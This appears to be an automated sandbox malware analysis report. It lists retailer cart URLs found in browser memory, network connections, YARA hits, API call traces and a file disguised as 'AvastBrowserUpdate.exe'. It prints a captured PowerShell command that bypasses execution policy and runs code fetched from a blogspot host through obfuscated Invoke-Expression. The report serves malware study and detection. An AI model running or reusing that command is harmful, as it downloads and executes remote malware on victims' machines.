                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.homesquare.com/Checkout/Cart.aspx
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hottopic.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hsn.com/checkout/bag
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ikea.com/us/en/shoppingcart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcpenney.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcrew.com/checkout/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.joann.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.kohls.com/checkout/shopping_cart.jsp
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.landsend.com/shopping-bag/
                      Source: chrome.exe, 00000023.00000002.289681278813.000060C40050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lowes.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lulus.com/checkout/bag
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.macys.com/my-bag
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.midwayusa.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.neimanmarcus.com/checkout/cart.jsp
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nike.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nordstrom.com/shopping-bag
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.officedepot.com/cart/shoppingCart.do
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.opticsplanet.com/checkout/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.otterbox.com/en-us/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.overstock.com/cart
                      Source: chrome.exe, 00000023.00000002.289685074726.000060C400844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.petsmart.com/cart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pier1.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pokemoncenter.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.potterybarn.com/shoppingcart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qvc.com/checkout/cart.html
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.redbubble.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rei.com/ShoppingCart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.revolve.com/r/ShoppingBag.jsp
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rockauto.com/en/cart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.saksfifthavenue.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.samsclub.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sephora.com/basket
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.shutterfly.com/cart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.staples.com/cc/mmx/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sweetwater.com/store/cart.php
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.talbots.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.target.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.teacherspayteachers.com/Cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.therealreal.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tractorsupply.com/TSCShoppingCartView
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ulta.com/bag
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.underarmour.com/en-us/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.urbanoutfitters.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.vitalsource.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walgreens.com/cart/view-ui
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walmart.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wayfair.com/v/checkout/basket/show
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.weightwatchers.com/us/shop/checkout/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.westelm.com/shoppingcart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wiley.com/en-us/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.williams-sonoma.com/shoppingcart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wish.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zappos.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zazzle.com/co/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zennioptical.com/shoppingCart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www2.hm.com/en_us/cart
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownHTTPS traffic detected: 74.125.138.132:443 -> 192.168.11.30:49806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 150.171.27.12:443 -> 192.168.11.30:49805 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.142.25:443 -> 192.168.11.30:49808 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.192.229.107:443 -> 192.168.11.30:49809 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.11.30:49815 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.11.30:49821 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.11.30:49838 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.192.229.107:443 -> 192.168.11.30:49850 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49851 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49853 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49856 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49858 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49859 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49860 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49862 version: TLS 1.2
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9014B6 lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,52_2_6B9014B6
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9014B6 lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,52_2_6B9014B6
                      Source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_ce58313c-9
                      Source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_0a0765d4-6
                      Source: Yara matchFile source: 19.3.svchost.exe.5200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.svchost.exe.5420000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.svchost.exe.5200000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.svchost.exe.5200000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.svchost.exe.5420000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8420, type: MEMORYSTR
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D1364 CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess,27_2_00007DF4586D1364

                      System Summary

                      barindex
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B7519A NtQueryInformationProcess,7_2_05B7519A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B7B28B NtQueryInformationProcess,7_2_05B7B28B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B777F1 NtQuerySystemInformation,malloc,NtQuerySystemInformation,K32GetProcessImageFileNameW,7_2_05B777F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B754D6 NtQuerySystemInformation,malloc,NtQuerySystemInformation,RtlGetVersion,lstrcmpiW,CloseHandle,free,7_2_05B754D6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B78A20 NtQueryInformationProcess,7_2_05B78A20
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000018CD28F1CF4 NtAcceptConnectPort,CloseHandle,27_2_0000018CD28F1CF4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000018CD28F15C0 NtAcceptConnectPort,27_2_0000018CD28F15C0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DEEF0 NtAcceptConnectPort,27_2_00007DF4586DEEF0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DFFDC RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free,27_2_00007DF4586DFFDC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DEFCC NtAcceptConnectPort,27_2_00007DF4586DEFCC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DEFAC NtAcceptConnectPort,27_2_00007DF4586DEFAC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DF050 NtAcceptConnectPort,27_2_00007DF4586DF050
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DF0B8 NtAcceptConnectPort,27_2_00007DF4586DF0B8
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586E0188 calloc,NtAcceptConnectPort,free,27_2_00007DF4586E0188
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DF244 NtAcceptConnectPort,27_2_00007DF4586DF244
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DF224 NtAcceptConnectPort,27_2_00007DF4586DF224
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DF3FC CreateFileMappingW,MapViewOfFile,DuplicateHandle,NtAcceptConnectPort,27_2_00007DF4586DF3FC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DF76C calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort,27_2_00007DF4586DF76C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE3EF64 NtAcceptConnectPort,33_2_0000022D0AE3EF64
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE3F19C NtAcceptConnectPort,33_2_0000022D0AE3F19C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61EED0 NtAcceptConnectPort,38_2_00000217CC61EED0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61EF64 NtAcceptConnectPort,38_2_00000217CC61EF64
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61F19C NtAcceptConnectPort,38_2_00000217CC61F19C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61F16C NtAcceptConnectPort,38_2_00000217CC61F16C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61F140 NtAcceptConnectPort,38_2_00000217CC61F140
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F23042F NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,52_3_7F23042F
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F23066F NtProtectVirtualMemory,52_3_7F23066F
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00E17FAB NtAllocateVirtualMemory,NtProtectVirtualMemory,VirtualFree,52_2_00E17FAB
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B98FD38: CreateFileW,DeviceIoControl,CloseHandle,52_2_6B98FD38
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B907333 OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,52_2_6B907333
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8FF189 CreateProcessAsUserW,52_2_6B8FF189
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_018D0C007_2_018D0C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_018D08607_2_018D0860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_018D08707_2_018D0870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B78FA87_2_05B78FA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B730007_2_05B73000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B7440E7_2_05B7440E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B7AD4F7_2_05B7AD4F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069955407_2_06995540
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02F30C008_2_02F30C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02F30BF08_2_02F30BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02F308708_2_02F30870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02F308608_2_02F30860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_065955408_2_06595540
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFB357E173522_2_00007FFB357E1735
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFB357E290D22_2_00007FFB357E290D
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD289252E27_3_0000018CD289252E
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD2895EC827_3_0000018CD2895EC8
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD28955C827_3_0000018CD28955C8
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD289594827_3_0000018CD2895948
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD28927D327_3_0000018CD28927D3
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD2891BDD27_3_0000018CD2891BDD
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD2892C7327_3_0000018CD2892C73
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD2894A8427_3_0000018CD2894A84
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000018CD28F0C7027_2_0000018CD28F0C70
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586B286C27_2_00007DF4586B286C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586C7E7427_2_00007DF4586C7E74
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D136427_2_00007DF4586D1364
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45872178427_2_00007DF458721784
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45875A79027_2_00007DF45875A790
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879E90827_2_00007DF45879E908
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DD8B827_2_00007DF4586DD8B8
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586F891027_2_00007DF4586F8910
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586BF9A027_2_00007DF4586BF9A0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D198C27_2_00007DF4586D198C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458705A0C27_2_00007DF458705A0C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879A9E427_2_00007DF45879A9E4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458792A7C27_2_00007DF458792A7C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D1B5427_2_00007DF4586D1B54
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458730AE427_2_00007DF458730AE4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587A4C7027_2_00007DF4587A4C70
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458725BEC27_2_00007DF458725BEC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587BBD3027_2_00007DF4587BBD30
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587B8D6427_2_00007DF4587B8D64
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45877DC7827_2_00007DF45877DC78
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458703D2827_2_00007DF458703D28
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879EE3C27_2_00007DF45879EE3C
